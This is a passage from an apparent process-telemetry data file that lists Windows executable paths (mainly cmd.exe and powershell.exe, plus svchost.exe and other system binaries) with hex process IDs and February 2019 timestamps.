00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd602019-02-09 21:56:45.653000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15882019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x17702019-02-10 01:48:41.643000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0x53c2019-02-10 03:06:45.883000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x16e82019-02-10 03:45:32.930000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x21b02019-02-10 03:47:36.837000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f7c2019-02-10 03:48:48.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x14542019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x14542019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x18442019-02-10 04:08:35.177000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe0x1ef42019-02-10 04:32:15.793000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1d3c2019-02-10 05:10:21.810000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x5942019-02-10 06:45:21.867000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23d82019-02-10 06:47:24.843000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x6342019-02-10 09:13:15.373000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x12e02019-02-10 09:45:45.050000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f602019-02-10 09:47:17.517000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 